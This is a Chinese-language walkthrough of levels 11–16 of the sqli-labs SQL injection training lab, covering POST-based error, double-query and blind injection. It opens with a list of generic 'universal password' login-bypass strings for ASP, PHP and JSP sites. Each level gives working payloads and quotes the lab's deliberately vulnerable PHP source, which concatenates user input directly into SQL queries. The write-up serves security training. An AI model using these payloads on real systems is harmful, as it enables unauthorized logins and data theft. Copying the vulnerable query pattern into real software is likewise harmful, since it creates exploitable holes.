Less-11 POST - Error Based - Single quotes - String
基于报错的单引号字符注入
如何绕过身份验证登入进去?万能密码登入
常用万能密码
asp、aspx
1: "or "a"="a
2: ')or('a'='a
3:or 1=1--
4:'or 1=1--
5:a'or' 1=1--
6: "or 1=1--
7:'or'a'='a
8: "or"="a'='a
9:'or''='
10:'or'='or'
11: 1 or '1'='1'=1
12: 1 or '1'='1' or 1=1
13: 'OR 1=1%00
14: "or 1=1%00
15: 'xor
16: 新型万能登陆密码
用户名 ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin)
密码 1
Username=-1%cf' union select 1,1,1 as password,1,1,1 %23
Password=1
17..admin' or 'a'='a 密码随便
PHP万能密码
'or'='or'
'or 1=1/* 字符型 GPC是否开都可以使用
User: something
Pass: ' OR '1'='1
jsp 万能密码
1'or'1'='1
admin' OR 1=1/*
用户名:admin 系统存在这个用户的时候 才用得上
密码:1'or'1'='1
payload
(1)万能密码
在passwd字段后面构造万能密码+闭合单引号
uname=admin&passwd=1' or '1'='1&submit=Submit
返回
Your Login name:Dumb
Your Password:Dumb
在uname字段后面构造万能密码+闭合单引号
uname=admin' or '1'='1&passwd=1&submit=Submit
返回
Your Login name:admin
Your Password:admin
我们发现两者返回的账户密码不一样,查看源代码
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname);
fwrite($fp,'Password:'.$passwd."\n");
fclose($fp);
// connectivity
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in\n\n " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
?>
sql语句如下:
SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1
情况一:
SELECT username, password FROM users WHERE username='admin' and password='1' or '1'='1' LIMIT 0,1
情况二:
SELECT username, password FROM users WHERE username='admin' or '1'='1' and password='1' LIMIT 0,1
and 优先级高,所以情况一前面为False,但是与True或运算为true,返回了第一个账号和密码;情况二后面为False,但存在admin这个账户,或运算为True,返回了admin账号的账号和密码
(2)联合查询
uname=test &passwd=test' order by 3%23 返回错误
uname=test &passwd=test' order by 2%23 返回正确
uname=test &passwd=test' union select 1,2 %23
返回:Your Login name:1
Your Password:2
剩下的注入查询数据库信息与之前get类似
Less-12 POST - Error Based - Double quotes - String -with twist
基于报错的双引号带括号的字符注入
与Less-11类似
payload
1、直接注释
uname=admin &passwd=1") or "1"="1" %23
2、闭合绕过
uname=admin &passwd=1") or ("1"="1
uname=admin") or( "1"="1 &passwd=1
联合查询
uname=test &passwd=test") order by 3 %23返回错误
uname=test &passwd=test") order by 2 %23返回正确
uname=test &passwd=test") union select 1,2 %23
返回:
Your Login name:1
Your Password:2
同上
Less-13 POST-Double Injection-Single quotes-String -with twist
测试
加单引号
uname=test &passwd=test'
报错如下 ''test'') LIMIT 0,1'
可知是单引号和括号包裹变量
uname=test &passwd=test') %23返回正常
uname=test &passwd=test') or 1=1%23 显示successfully loggend in
源代码如下:
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'Password:'.$passwd."\n");
fclose($fp);
// connectivity
@$sql="SELECT username, password FROM users WHERE username=('$uname') and password=('$passwd') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
//echo 'Your Login name:'. $row['username'];
//echo "<br>";
//echo 'Your Password:' .$row['password'];
//echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
?>
登入成功返回的是flag.jpg图片,图片显示successfully logined in;失败是slap.jpg的图片。不会显示登入的账号和密码信息
payload
万能密码登入
uname=test &passwd=test') or 1=1%23
双注入查询
原理参考Less-5
uname=test &passwd=test') or 1=1 order by 3 %23返回错误
uname=test &passwd=test') or 1=1 order by 2 %23返回正常
uname=test &passwd=test') or 1=1 union select 1,2 %23返回成功但是没有显示位
使用双查询注入方式
uname=test &passwd=test') union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a %23
返回
Duplicate entry '::security::1' for key 'group_key'
剩下的参考Less-5
Less-14 POST-Double Injection-Double quotes-String-with twist
测试
单引号
uname=test &passwd=test' or 1=1 %23返回失败图片
双引号
uname=test &passwd=test"or 1=1 %23 返回成功图片
参数是由双引号包裹
源代码
$uname='"'.$uname.'"';
$passwd='"'.$passwd.'"';
@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";
注意点号是起连接作用,将变量一前一后分别连接一个双引号
这里调试直接echo出变量可以看到
uname=uname &passwd=passwd
输出:"uname ""passwd"
可以看到是单引号包裹着
测试字段数
uname=uname &passwd=passwd" or 1=1 order by 2 %23
剩下的与Less-13相似
Less-15 POST-Blind-Boolian/time Based-Single quotes
基于布尔型或时间的单引号post盲注
测试
在后面添加单引号、双引号、括号等无任何错误显示,只显示一个错误的图片,错误回显应该是被注释了。
uname=uname &passwd=passwd' or 1=1 %23返回正确
字段数
uname=uname &passwd=passwd' or 1=1 order by 2 %23
显示位
uname=uname &passwd=passwd' or 1=1 union select 1,2 %23执行成功没有回显
使用双查询输入
uname=test &passwd=test' or 1=1 union select count(*),concat(0x3a,0x3a,(select database()),0x3a,0x3a,floor(rand()*2))a from information_schema.columns group by a %23 返回成功但并没有报错显示我们想要的数据
为什么Less13-14中使用双查询输入有效而在这里不行?
Less-15源代码
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
$uname=$_POST['uname'];
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname);
fwrite($fp,'Password:'.$passwd."\n");
fclose($fp);
// connectivity
@$sql="SELECT username, password FROM users WHERE username='$uname' and password='$passwd' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
//echo '<font color= "#0000ff">';
echo "<br>";
echo '<font color= "#FFFF00" font size = 4>';
//echo " You Have successfully logged in\n\n " ;
echo '<font size="3" color="#0000ff">';
echo "<br>";
//echo 'Your Login name:'. $row['username'];
echo "<br>";
//echo 'Your Password:' .$row['password'];
echo "<br>";
echo "</font>";
echo "<br>";
echo "<br>";
echo '<img src="../images/flag.jpg" />';
echo "</font>";
}
else
{
echo '<font color= "#0000ff" font size="3">';
//echo "Try again looser";
//print_r(mysql_error());
echo "</br>";
echo "</br>";
echo "</br>";
echo '<img src="../images/slap.jpg" />';
echo "</font>";
}
}
?>
查看对比两者的源代码可以发现在本关中print_r(mysql_error());函数被注释了
payload
这里使用布尔型盲注
uname=test &passwd=test' or length((select database())) =8 %23 返回正确
剩下参考Less-8
Less-16 POST-Blind-Boolian/Time Based-Double quotes
基于布尔型或时间的双引号post盲注
测试
uname=test &passwd=test ' or 1=1 %23返回错误
uname=test &passwd=test') or 1=1 %23返回错误
uname=test &passwd=test " or 1=1 %23返回错误
uname=test &passwd=test") or 1=1 %23返回正确
payload
字段数
uname=test &passwd=test ") or 1=1 order by 2%23返回正确
uname=test &passwd=test ") or 1=1 order by 3%23返回错误
剩下参考Less-15